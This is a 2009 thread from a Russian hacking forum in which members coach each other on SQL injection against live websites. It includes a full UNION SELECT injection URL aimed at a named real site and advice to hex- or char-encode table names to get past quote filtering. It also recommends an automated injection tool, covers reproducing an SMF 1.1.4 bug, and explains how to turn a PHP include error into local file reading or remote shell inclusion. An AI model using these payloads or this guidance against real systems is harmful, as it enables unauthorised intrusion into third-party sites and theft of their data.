23.06.2009, 00:23
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
Сообщение от jecka3000
Krist_ALL, может и тупой вопрос, но всё же, почему же тогда запрос http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1+union+select+1,2,3,4,column_name,6,7,8,9,10,11,1 2,13,14,15,16,17+from+information_schema.columns+w here+table_name=%27user%27+--
не катит?)
нет там таблицы user, и в любом случае при таком методе имя таблицы переводи в HEX, когда кавычки фильтруются.
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
23.06.2009, 05:16
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
|
|
Сообщение от Ded MustD!e
нет там таблицы user, и в любом случае при таком методе имя таблицы переводи в HEX, когда кавычки фильтруются.
там есть табла юзер =) Но да, кавычки фильтруются - нужно хексить или чарить =)
а сипт ненуюно юзать - там 5 версия, всё и атк просто 
|
|
|
|
23.06.2009, 00:38
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами:
9116877
Репутация:
468
|
|
Чтобы руками не перебирать все, юзаем sipt. но КТО НЕ ЗНАЕТ КАК СДЕЛАТЬ РУКАМИ ИНЕКЦИЮ НЕ ЮЗАЙТЕ СИПТ! Если что-то делать, так с умом.
|
|
|
|
23.06.2009, 09:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
__http://www.xakep.ru/post/45088/default.asp
народ ..тут видео как чел нашел багу в SMF 1.1.4, он использует прогу Odysseus не подскажите в чем у меня косяк , когдая вроде делаю все тоже самое тока у меня почему то не вылезают те ошибки которые у него ??
P.S. мб я скачал уже пропатченную версию?, хотя код вроде тот же самый что и у него......юзаю оперу
Код:
// Let's not depend on the ini settings... why even have COOKIE in there, anyway?
$_REQUEST = $_POST + $_GET;
// Make sure $board and $topic are numbers.
if (isset($_REQUEST['board']))
{
// Make sure that its a string and not something else like an array
$_REQUEST['board'] = (string) $_REQUEST['board'];
// If there's a slash in it, we've got a start value! (old, compatible links.)
if (strpos($_REQUEST['board'], '/') !== false)
list ($_REQUEST['board'], $_REQUEST['start']) = explode('/', $_REQUEST['board']);
// Same idea, but dots. This is the currently used format - ?board=1.0...
elseif (strpos($_REQUEST['board'], '.') !== false)
list ($_REQUEST['board'], $_REQUEST['start']) = explode('.', $_REQUEST['board']);
// Now make absolutely sure it's a number.
$board = (int) $_REQUEST['board'];
// This is for "Who's Online" because it might come via POST - and it should be an int here.
$_GET['board'] = $board;
}
// Well, $board is going to be a number no matter what.
else
$board = 0;
// If there's a threadid, it's probably an old YaBB SE link. Flow with it.
if (isset($_REQUEST['threadid']) && !isset($_REQUEST['topic']))
$_REQUEST['topic'] = $_REQUEST['threadid'];
// We've got topic!
if (isset($_REQUEST['topic']))
{
// Make sure that its a string and not something else like an array
$_REQUEST['topic'] = (string)$_REQUEST['topic'];
// Slash means old, beta style, formatting. That's okay though, the link should still work.
if (strpos($_REQUEST['topic'], '/') !== false)
list ($_REQUEST['topic'], $_REQUEST['start']) = explode('/', $_REQUEST['topic']);
// Dots are useful and fun ;). This is ?topic=1.15.
elseif (strpos($_REQUEST['topic'], '.') !== false)
list ($_REQUEST['topic'], $_REQUEST['start']) = explode('.', $_REQUEST['topic']);
$topic = (int) $_REQUEST['topic'];
// Now make sure the online log gets the right number.
$_GET['topic'] = $topic;
}
если что прога вот
__http://komm.gaz.ru/doka/doc/online/XAKER/Xaker01_2009_dvd/files/soft/Windows/Security/Odysseus%202.0.0.84/Odysseus-2-0-0-84.exe
Последний раз редактировалось HAXTA4OK; 23.06.2009 в 09:48..
|
|
|
|
25.06.2009, 15:11
|
|
Новичок
Регистрация: 28.06.2008
Сообщений: 29
С нами:
9404720
Репутация:
7
|
|
При добавлении кавычки ' (/index.php?page=19') вылитает такая ошибка:
Код:
Warning: require(.dat) [function.require]: failed to open stream: No such file or directory in /home/host.ru/public_html/index.php on line 46
Fatal error: require() [function.require]: Failed opening required '.dat' (include_path='.:/usr/lib/php') in /home/host.ru/public_html/index.php on line 46
Я в скуль иньекциях ток пытаюсь разобратся, подскажите что в данном случае можно сделать? |
|
|
|
25.06.2009, 15:19
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами:
9095366
Репутация:
298
|
|
в данном случае это не sql-inj а php инклуд.
т.е. вы можете попробовать поинклудить (просмотреть) файл на сервере (LFI) либо можете проинклудить шелл с удаленного сервера (RFI)
доп.информацию можете почитать в соседних топиках, там всё это есть.
|
|
|
|
25.06.2009, 18:30
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами:
9076508
Репутация:
169
|
|
Нету там помойму нече. Просто при подстановке некоторых символов оно выводит ошибку.
|
|
|
|
25.06.2009, 18:49
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Является ли такой запрос опасным? (в плане sql-inj)
"SELECT ... WHERE `id` = '".(int)$_GET['id']."'"
Если да то как примерно все это реализовывается? (там же токо число выводят, если get запрос будет таким id=9999+union+... то наврятли что-то выполнится(sql))
|
|
|
|
25.06.2009, 20:24
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от diznt
Является ли такой запрос опасным? (в плане sql-inj)
"SELECT ... WHERE `id` = '".(int)$_GET['id']."'"
Если да то как примерно все это реализовывается? (там же токо число выводят, если get запрос будет таким id=9999+union+... то наврятли что-то выполнится(sql))
нет так как стоит (int )
|
|
|
|
26.06.2009, 01:34
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от HAXTA4OK
нет так как стоит (int )
Но в плане раскрытия путей может быть опасно, т.к. не предотрващает отрицательного значения данных, хотя я скорее всего неправ, и даже наверняка, думаю поправят, если что 
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
